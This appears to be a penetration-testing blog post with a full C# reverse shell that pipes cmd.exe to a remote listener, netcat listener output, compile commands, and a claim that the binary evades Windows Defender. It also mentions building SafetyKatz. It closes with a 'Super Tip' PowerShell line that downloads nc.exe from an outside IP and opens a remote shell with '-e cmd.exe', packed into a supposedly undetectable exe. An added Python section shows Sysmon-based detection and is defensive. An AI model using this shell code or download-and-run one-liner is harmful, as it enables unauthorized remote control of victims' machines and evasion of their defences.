C# Simple Reverse Shell Code writing
Looking on GitHub, there are many examples of C# code that open reverse shells via cmd.exe. In this case I copied parts of that code and used the following simple C# program. No evasion, no persistence, no hiding code, only a simple "open socket and launch cmd.exe on the victim machine":
    using System;
    using System.Text;
    using System.IO;
    using System.Diagnostics;
    using System.ComponentModel;
    using System.Linq;
    using System.Net;
    using System.Net.Sockets;

    namespace ConnectBack
    {
        public class Program
        {
            static StreamWriter streamWriter;

            public static void Main(string[] args)
            {
                using(TcpClient client = new TcpClient("10.0.2.15", 443))
                {
                    using(Stream stream = client.GetStream())
                    {
                        using(StreamReader rdr = new StreamReader(stream))
                        {
                            streamWriter = new StreamWriter(stream);

                            StringBuilder strInput = new StringBuilder();

                            Process p = new Process();
                            p.StartInfo.FileName = "cmd.exe";
                            p.StartInfo.CreateNoWindow = true;
                            p.StartInfo.UseShellExecute = false;
                            p.StartInfo.RedirectStandardOutput = true;
                            p.StartInfo.RedirectStandardInput = true;
                            p.StartInfo.RedirectStandardError = true;
                            p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                            p.Start();
                            p.BeginOutputReadLine();

                            while(true)
                            {
                                strInput.Append(rdr.ReadLine());
                                //strInput.Append("\n");
                                p.StandardInput.WriteLine(strInput);
                                strInput.Remove(0, strInput.Length);
                            }
                        }
                    }
                }
            }

            private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
            {
                StringBuilder strOutput = new StringBuilder();

                if (!String.IsNullOrEmpty(outLine.Data))
                {
                    try
                    {
                        strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                    }
                    catch (Exception err) { }
                }
            }
        }
    }
I put my Kali machine in listening mode on port 443 with netcat, then compiled and executed my code.
As you can see, the .exe file is clean for Windows Defender. From the AV side, no malicious actions were performed yet. This could be a standard result.
When the file is executed, the cmd instance is visible to the user, and if the prompt window is closed, the shell closes as well.
    root@kali:~# nc -lvp 443
    listening on [any] 443 ...
    192.168.178.14: inverse host lookup failed: Unknown host
    connect to [192.168.178.16] from (UNKNOWN) [192.168.178.14] 25852
    Microsoft Windows [Version 10.0.17134.523]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\PENTEST>
    C:\PENTEST>whoami
    lt-jacco\jacco
Running the exe file immediately spawns the shell on my Kali machine.
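Seen from the defender's side, a file that scans clean still leaves behaviour in the telemetry: a process that opens an outbound TCP connection and then starts cmd.exe as its child. The following is an added example, not code from the original post, that correlates Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. The field names follow Sysmon; the sample events, the GUID values, the allow-list of parents and the function names are constructed assumptions.

```python
import ntpath

SHELLS = {"cmd.exe", "powershell.exe"}
# Assumption: parents that legitimately start shells in this environment.
EXPECTED_PARENTS = {"explorer.exe", "windowsterminal.exe", "services.exe"}

# Constructed sample events using Sysmon field names (Event IDs 1 and 3).
EVENTS = [
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": r"C:\PENTEST\Simple_Rev_Shell443.exe",
     "Initiated": True, "DestinationIp": "192.168.178.16", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\PENTEST\Simple_Rev_Shell443.exe"},
    {"EventID": 1, "ProcessGuid": "{B2}", "ParentProcessGuid": "{B1}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessGuid": "{C1}", "Image": r"C:\Program Files\Browser\browser.exe",
     "Initiated": True, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

def basename(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()

def find_networked_shell_parents(events):
    """Return alerts for shells whose parent process made an outbound connection."""
    # Pass 1: index outbound connections by the process that initiated them.
    outbound = {}
    for ev in events:
        if ev["EventID"] == 3 and ev.get("Initiated"):
            outbound.setdefault(ev["ProcessGuid"], []).append(
                (ev["DestinationIp"], ev["DestinationPort"]))
    # Pass 2: flag shell launches whose parent is in that index and is not expected.
    alerts = []
    for ev in events:
        if ev["EventID"] != 1 or basename(ev["Image"]) not in SHELLS:
            continue
        parent = ev["ParentProcessGuid"]
        if parent in outbound and basename(ev["ParentImage"]) not in EXPECTED_PARENTS:
            alerts.append({"parent": ev["ParentImage"], "shell": ev["Image"],
                           "connections": outbound[parent]})
    return alerts

if __name__ == "__main__":
    for alert in find_networked_shell_parents(EVENTS):
        print(alert)
```

The two passes make the correlation independent of event order, since the connection and the child process can be logged in either sequence.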
Finding the C# compiler (csc.exe)
dir /s %WINDIR%\CSC.EXE
Compiling
    c:\PENTEST>c:\windows\Microsoft.NET\Framework\v3.5\csc.exe /t:exe /out:Simple_Rev_Shell443.exe Simple_Rev_Shell443.cs
    Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.8931
    for Microsoft (R) .NET Framework version 3.5
    Copyright (C) Microsoft Corporation. All rights reserved.

    Simple_Rev_Shell443.cs(64,34): warning CS0168: The variable 'err' is declared but never used

    c:\PENTEST>dir Simple_Rev_Shell443.*
     Volume in drive C is Boot
     Volume Serial Number is 9488-7836

     Directory of c:\PENTEST

    09/02/2019  19:45             1.822 Simple_Rev_Shell443.cs
    10/02/2019  10:27             5.120 Simple_Rev_Shell443.exe
                   2 File(s)          6.942 bytes
                   0 Dir(s)   6.854.045.696 bytes free
Reference used: https://github.com/itaykrk/CSharp-reverse-tcp
Not for this, but when compiling saftykatz32.exe: why do I get the following error, "Unsafe code may only appear if compiling with /unsafe"? I work in C# and Visual Studio 2015 for programming on Windows.
To use unsafe code blocks, the project has to be compiled with the /unsafe switch on.
Open the properties for the project, go to the Build tab and check the Allow unsafe code checkbox.
Or use below :
Super Tip: use https://www.battoexeconverter.com/ to convert puckie.bat [containing: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://31.21.73.15/nc.exe','nc.exe')"; Start-Process nc.exe -NoNewWindow -Argumentlist '31.21.73.15 53 -e cmd.exe'] to puckie.exe, and you have a Defender-undetectable exe file to create a remote shell!
Author : Jacco Straathof